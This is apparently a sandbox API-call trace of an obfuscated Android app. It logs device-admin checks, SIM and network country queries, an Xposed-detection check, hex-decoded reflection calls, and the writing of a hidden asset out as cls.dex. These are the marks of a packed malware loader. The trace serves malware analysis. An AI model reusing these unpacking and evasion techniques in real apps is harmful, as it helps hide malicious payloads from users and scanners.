API: android.app.SharedPreferencesImpl->getString at com.czybg.eqtbdmzpklrgyns.EZmcnv.hZyMGHgz:7 Show source
NameTypeValue
p0java.lang.String
  • toString: ttrgsvwser
p1java.lang.String
  • toString: ""
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: com.czybg.eqtbdmzpklrgyns.MainApp->getSystemService at com.czybg.eqtbdmzpklrgyns.HLqFdR.xnLvoQ:6 Show source
NameTypeValue
p0java.lang.String
  • toString: phone
NameTypeValue
Return Valueandroid.telephony.TelephonyManager
  • toString: android.telephony.TelephonyManager@303eb5d8
API: android.telephony.TelephonyManager->getSimCountryIso at com.czybg.eqtbdmzpklrgyns.HLqFdR.xnLvoQ:13 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: android.telephony.TelephonyManager->getPhoneType at com.czybg.eqtbdmzpklrgyns.HLqFdR.xnLvoQ:32 Show source
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 0
API: android.telephony.TelephonyManager->getNetworkCountryIso at com.czybg.eqtbdmzpklrgyns.HLqFdR.xnLvoQ:36 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.HLqFdR.LmcGi:3 Show source
NameTypeValue
p0java.lang.String
  • toString: device_policy
NameTypeValue
Return Valueandroid.app.admin.DevicePolicyManager
  • toString: android.app.admin.DevicePolicyManager@1f2c60aa
API: pvsaeqhpgq.zvsin->getPackageName at com.czybg.eqtbdmzpklrgyns.HLqFdR.LmcGi:29 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.HLqFdR.LmcGi:3 Show source
NameTypeValue
p0java.lang.String
  • toString: device_policy
NameTypeValue
Return Valueandroid.app.admin.DevicePolicyManager
  • toString: android.app.admin.DevicePolicyManager@1f2c60aa
API: pvsaeqhpgq.zvsin->getPackageName at com.czybg.eqtbdmzpklrgyns.HLqFdR.LmcGi:29 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
API: com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ->startService at com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.onCreate:47 Show source
NameTypeValue
p0android.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.Vdptsq.MCq9ggDf53Iz0h }
NameTypeValue
Return Valueandroid.content.ComponentName
  • toString: ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h}
API: com.czybg.eqtbdmzpklrgyns.EZmcnv->xnLvoQ at com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.onStartCommand:7 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: android.content.Intent->getStringExtra at com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.onStartCommand:16 Show source
NameTypeValue
p0java.lang.String
  • toString: tag
NameTypeValue
Return Valuejava.lang.String
  • toString: default
API: com.czybg.eqtbdmzpklrgyns.EZmcnv->hZyMGHgz at com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.onStartCommand:25 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: android.content.Intent->getStringExtra at com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.onStartCommand:34 Show source
NameTypeValue
p0java.lang.String
  • toString: sdkId
NameTypeValue
Return Valuejava.lang.String
  • toString: szzRas4x
API: android.content.Intent->putExtra at com.czybg.eqtbdmzpklrgyns.MultiLoader.service:12 Show source
NameTypeValue
p0java.lang.String
  • toString: tag
p1java.lang.String
  • toString: default
NameTypeValue
Return Valueandroid.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
API: android.content.Intent->putExtra at com.czybg.eqtbdmzpklrgyns.MultiLoader.service:17 Show source
NameTypeValue
p0java.lang.String
  • toString: sdkId
p1java.lang.String
  • toString: szzRas4x
NameTypeValue
Return Valueandroid.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
API: com.czybg.eqtbdmzpklrgyns.MainApp->startService at com.czybg.eqtbdmzpklrgyns.MultiLoader.service:19 Show source
NameTypeValue
p0android.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
NameTypeValue
Return Valueandroid.content.ComponentName
  • toString: ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ}
API: com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ->getApplicationContext at com.czybg.eqtbdmzpklrgyns.QsRifJa.<init>:4 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: android.content.Intent->getAction at com.czybg.eqtbdmzpklrgyns.QsRifJa.DiXsQ:5 Show source
NameTypeValue
Return Valuenull
  • toString: null
API: android.app.SharedPreferencesImpl->getString at com.czybg.eqtbdmzpklrgyns.XpiFj.DiXsQ:10 Show source
NameTypeValue
p0java.lang.String
  • toString: 255251
p1java.lang.String
  • toString: ""
NameTypeValue
Return Valuejava.lang.String
  • toString: ""
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.hekJfDg.<init>:84 Show source
NameTypeValue
p0java.lang.String
  • toString: device_policy
NameTypeValue
Return Valueandroid.app.admin.DevicePolicyManager
  • toString: android.app.admin.DevicePolicyManager@1f2c60aa
API: android.app.admin.DevicePolicyManager->isAdminActive at com.czybg.eqtbdmzpklrgyns.hekJfDg.DiXsQ:10 Show source
NameTypeValue
whoandroid.content.ComponentName
  • toString: ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.BYdZZAIwCWFdZwW}
NameTypeValue
Return Valuejava.lang.Boolean
  • toString: false
API: pvsaeqhpgq.zvsin->getApplicationContext at com.czybg.eqtbdmzpklrgyns.hekJfDg.DiXsQ:34 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: android.content.Intent->putExtra at com.czybg.eqtbdmzpklrgyns.hekJfDg.DiXsQ:12 Show source
NameTypeValue
p0java.lang.String
  • toString: computer
p1com.czybg.eqtbdmzpklrgyns.uIcqnrbS
  • toString: com.czybg.eqtbdmzpklrgyns.uIcqnrbS@3a498c13
NameTypeValue
Return Valueandroid.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.FooVJESlkd1K (has extras) }
API: pvsaeqhpgq.zvsin->startActivity at com.czybg.eqtbdmzpklrgyns.hekJfDg.DiXsQ:20 Show source
NameTypeValue
p0android.content.Intent
  • toString: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.FooVJESlkd1K (has extras) }
API: pvsaeqhpgq.zvsin->getPackageName at com.czybg.eqtbdmzpklrgyns.qwAiT.<init>:19 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.qwAiT.<init>:35 Show source
NameTypeValue
p0java.lang.String
  • toString: wifi
NameTypeValue
Return Valueandroid.net.wifi.WifiManager
  • toString: android.net.wifi.WifiManager@31a7589e
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.qwAiT.<init>:60 Show source
NameTypeValue
p0java.lang.String
  • toString: power
NameTypeValue
Return Valueandroid.os.PowerManager
  • toString: android.os.PowerManager@2cca7b4c
API: pvsaeqhpgq.zvsin->getApplicationContext at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:15 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: pvsaeqhpgq.zvsin->getApplicationContext at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:24 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:29 Show source
NameTypeValue
p0java.lang.String
  • toString: alarm
NameTypeValue
Return Valueandroid.app.AlarmManager
  • toString: android.app.AlarmManager@eca0038
API: pvsaeqhpgq.zvsin->getApplicationContext at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:15 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: pvsaeqhpgq.zvsin->getApplicationContext at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:24 Show source
NameTypeValue
Return Valuepvsaeqhpgq.zvsin
  • toString: pvsaeqhpgq.zvsin@15460b30
API: pvsaeqhpgq.zvsin->getSystemService at com.czybg.eqtbdmzpklrgyns.qwAiT.DiXsQ:29 Show source
NameTypeValue
p0java.lang.String
  • toString: alarm
NameTypeValue
Return Valueandroid.app.AlarmManager
  • toString: android.app.AlarmManager@eca0038
API: java.io.File-><init> at etxtfvw.cqwwrwk.attachBaseContext:5 Show source
NameTypeValue
p0java.lang.String
  • toString: /system/framework/XposedBridge.jar
NameTypeValue
Return Valuejava.io.File
  • toString: /system/framework/XposedBridge.jar
API: java.io.File->exists at etxtfvw.cqwwrwk.YVAFbUcSQ:92 Show source
NameTypeValue
Return Valuejava.lang.Boolean
  • toString: false
API: etxtfvw.cqwwrwk->YVAFbUcSQ at etxtfvw.cqwwrwk.attachBaseContext:5 Show source
NameTypeValue
Return Valuejava.lang.Boolean
  • toString: false
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2930bfa6
  • $1: YRkFJMV
  • $2: 59526B464A4D56
NameTypeValue
Return Valuejava.lang.String
  • toString: YRkFJMV
API: java.lang.Class->getDeclaredMethod at etxtfvw.cqwwrwk.attachBaseContext:25 Show source
NameTypeValue
p0java.lang.String
  • toString: YRkFJMV
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@1f308d94
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: private void etxtfvw.cqwwrwk.YRkFJMV()
  • getName: YRkFJMV
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@3d94f183
  • $1: android.content.res.AssetManager
  • $2: 616E64726F69642E636F6E74656E742E7265732E41737365744D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: android.content.res.AssetManager
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:9 Show source
NameTypeValue
p0java.lang.String
  • toString: android.content.res.AssetManager
NameTypeValue
Return Valuejava.lang.Class
  • toString: class android.content.res.AssetManager
  • getName: android.content.res.AssetManager
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@42b22df
  • $1: open
  • $2: 6F70656E
NameTypeValue
Return Valuejava.lang.String
  • toString: open
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@ba589f5
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:31 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.String
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.String
  • getName: java.lang.String
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:35 Show source
NameTypeValue
p0java.lang.String
  • toString: open
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@10ff9e18
  • Arrays.toString: [class java.lang.String]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
  • getName: open
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@15908ed7
  • $1: getAssets
  • $2: 676574417373657473
NameTypeValue
Return Valuejava.lang.String
  • toString: getAssets
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:52 Show source
NameTypeValue
p0java.lang.String
  • toString: getAssets
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@342202ad
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public android.content.res.AssetManager android.content.ContextWrapper.getAssets()
  • getName: getAssets
API: etxtfvw.cqwwrwk->getAssets at etxtfvw.cqwwrwk.YRkFJMV:62 Show source
NameTypeValue
Return Valueandroid.content.res.AssetManager
  • toString: android.content.res.AssetManager@b801830
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:62 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@36e54173
NameTypeValue
Return Valueandroid.content.res.AssetManager
  • toString: android.content.res.AssetManager@b801830
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@852e22e
  • $1: UMQrTOWqmLF
  • $2: 554D5172544F57716D4C46
NameTypeValue
Return Valuejava.lang.String
  • toString: UMQrTOWqmLF
API: android.content.res.AssetManager->open at etxtfvw.cqwwrwk.YRkFJMV:78 Show source
NameTypeValue
fileNamejava.lang.Object
  • toString: UMQrTOWqmLF
NameTypeValue
Return Valueandroid.content.res.AssetManager$AssetInputStream
  • toString: android.content.res.AssetManager$AssetInputStream@29c881cf
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:78 Show source
NameTypeValue
p0android.content.res.AssetManager
  • toString: android.content.res.AssetManager@b801830
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1706875c
  • Arrays.toString: [UMQrTOWqmLF]
NameTypeValue
Return Valueandroid.content.res.AssetManager$AssetInputStream
  • toString: android.content.res.AssetManager$AssetInputStream@29c881cf
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@132ef33a
  • $1: available
  • $2: 617661696C61626C65
NameTypeValue
Return Valuejava.lang.String
  • toString: available
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:95 Show source
NameTypeValue
p0java.lang.String
  • toString: available
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@3526b7e1
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final int android.content.res.AssetManager$AssetInputStream.available() throws java.io.IOException
  • getName: available
API: android.content.res.AssetManager$AssetInputStream->available at etxtfvw.cqwwrwk.YRkFJMV:105 Show source
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 581760
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:105 Show source
NameTypeValue
p0android.content.res.AssetManager$AssetInputStream
  • toString: android.content.res.AssetManager$AssetInputStream@29c881cf
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@9bcdbc7
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 581760
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@b1caf92
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:121 Show source
NameTypeValue
p0java.lang.String
  • toString: java.io.File
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.io.File
  • getName: java.io.File
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@27d232de
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:136 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.String
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.String
  • getName: java.lang.String
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@26326d5
  • $1: getFilesDir
  • $2: 67657446696C6573446972
NameTypeValue
Return Valuejava.lang.String
  • toString: getFilesDir
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:170 Show source
NameTypeValue
p0java.lang.String
  • toString: getFilesDir
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@30ad25db
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File android.content.ContextWrapper.getFilesDir()
  • getName: getFilesDir
API: etxtfvw.cqwwrwk->getFilesDir at etxtfvw.cqwwrwk.YRkFJMV:180 Show source
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:180 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1e3c5b51
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@34ce44b7
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:193 Show source
NameTypeValue
p0java.lang.String
  • toString: java.io.File
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.io.File
  • getName: java.io.File
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@4ac2142
  • $1: separator
  • $2: 736570617261746F72
NameTypeValue
Return Valuejava.lang.String
  • toString: separator
API: java.lang.reflect.Field->get at etxtfvw.cqwwrwk.YRkFJMV:207 Show source
NameTypeValue
p0null
  • toString: null
NameTypeValue
Return Valuejava.lang.String
  • toString: /
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2ddf0f8e
  • $1: cls.dex
  • $2: 636C732E646578
NameTypeValue
Return Valuejava.lang.String
  • toString: cls.dex
API: java.lang.reflect.Constructor->newInstance at etxtfvw.cqwwrwk.YRkFJMV:227 Show source
NameTypeValue
p0java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1a7f3bcb
  • $1: createNewFile
  • $2: 6372656174654E657746696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: createNewFile
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:244 Show source
NameTypeValue
p0java.lang.String
  • toString: createNewFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@2879bac1
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public boolean java.io.File.createNewFile() throws java.io.IOException
  • getName: createNewFile
API: java.io.File->createNewFile at etxtfvw.cqwwrwk.YRkFJMV:254 Show source
NameTypeValue
Return Valuejava.lang.Boolean
  • toString: true
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:254 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1843c9a7
NameTypeValue
Return Valuejava.lang.Boolean
  • toString: true
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@d935ef2
  • $1: read
  • $2: 72656164
NameTypeValue
Return Valuejava.lang.String
  • toString: read
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@58f9bc0
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:278 Show source
NameTypeValue
p0java.lang.String
  • toString: [B
NameTypeValue
Return Valuejava.lang.Class
  • toString: class [B
  • getName: [B
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:282 Show source
NameTypeValue
p0java.lang.String
  • toString: read
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@18ae469f
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final int android.content.res.AssetManager$AssetInputStream.read(byte[]) throws java.io.IOException
  • getName: read
API: android.content.res.AssetManager$AssetInputStream->read at etxtfvw.cqwwrwk.YRkFJMV:294 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@11bbda4a
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 581760
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:294 Show source
NameTypeValue
p0android.content.res.AssetManager$AssetInputStream
  • toString: android.content.res.AssetManager$AssetInputStream@29c881cf
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@3870b3b5
  • Arrays.toString: [[B@11bbda4a]
NameTypeValue
Return Valuejava.lang.Integer
  • toString: 581760
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@3b45d631
  • $1: close
  • $2: 636C6F7365
NameTypeValue
Return Valuejava.lang.String
  • toString: close
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:310 Show source
NameTypeValue
p0java.lang.String
  • toString: close
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@135c6a97
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public final void android.content.res.AssetManager$AssetInputStream.close() throws java.io.IOException
  • getName: close
API: android.content.res.AssetManager$AssetInputStream->close at etxtfvw.cqwwrwk.YRkFJMV:320 Show source
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:320 Show source
NameTypeValue
p0android.content.res.AssetManager$AssetInputStream
  • toString: android.content.res.AssetManager$AssetInputStream@29c881cf
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@3e70a46d
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@19f31933
  • $1: CNLldGq
  • $2: 434E4C6C644771
NameTypeValue
Return Valuejava.lang.String
  • toString: CNLldGq
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e001a69
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:344 Show source
NameTypeValue
p0java.lang.String
  • toString: [B
NameTypeValue
Return Valuejava.lang.Class
  • toString: class [B
  • getName: [B
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:348 Show source
NameTypeValue
p0java.lang.String
  • toString: CNLldGq
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@5c0f01c
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public [B etxtfvw.cqwwrwk.CNLldGq(byte[])
  • getName: CNLldGq
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@266e7bab
  • $1: getPackageManager
  • $2: 6765745061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageManager
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:18 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@25c7ada1
NameTypeValue
Return Valueandroid.app.ApplicationPackageManager
  • toString: android.app.ApplicationPackageManager@18722bc6
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@85126b4
  • $1: getPackageInfo
  • $2: 6765745061636B616765496E666F
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageInfo
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@34553e52
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2633fa20
  • $1: getPackageManager
  • $2: 6765745061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageManager
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:63 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@be4ed9e
NameTypeValue
Return Valueandroid.app.ApplicationPackageManager
  • toString: android.app.ApplicationPackageManager@18722bc6
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@5ae984c
  • $1: getPackageName
  • $2: 6765745061636B6167654E616D65
NameTypeValue
Return Valuejava.lang.String
  • toString: getPackageName
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:84 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@282e45aa
NameTypeValue
Return Valuejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@ee64111
  • $1: android.content.pm.PackageManager
  • $2: 616E64726F69642E636F6E74656E742E706D2E5061636B6167654D616E61676572
NameTypeValue
Return Valuejava.lang.String
  • toString: android.content.pm.PackageManager
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2330077
  • $1: GET_SIGNATURES
  • $2: 4745545F5349474E415455524553
NameTypeValue
Return Valuejava.lang.String
  • toString: GET_SIGNATURES
API: android.content.pm.PackageManager->getPackageInfo at etxtfvw.cqwwrwk.CNLldGq:110 Show source
NameTypeValue
packageNamejava.lang.String
  • toString: com.czybg.eqtbdmzpklrgyns
flagsjava.lang.Integer
  • toString: 64
NameTypeValue
Return Valueandroid.content.pm.PackageInfo
  • toString: PackageInfo{29f81468 com.czybg.eqtbdmzpklrgyns}
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:110 Show source
NameTypeValue
p0android.app.ApplicationPackageManager
  • toString: android.app.ApplicationPackageManager@18722bc6
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@b30526
  • Arrays.toString: [com.czybg.eqtbdmzpklrgyns, 64]
NameTypeValue
Return Valueandroid.content.pm.PackageInfo
  • toString: PackageInfo{29f81468 com.czybg.eqtbdmzpklrgyns}
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1c6e0f14
  • $1: signatures
  • $2: 7369676E617475726573
NameTypeValue
Return Valuejava.lang.String
  • toString: signatures
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@24ba4db2
  • $1: toByteArray
  • $2: 746F427974654172726179
NameTypeValue
Return Valuejava.lang.String
  • toString: toByteArray
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:150 Show source
NameTypeValue
p0android.content.pm.Signature
  • toString: android.content.pm.Signature@d52195d5
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1fb5ceb9
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@17b92fe
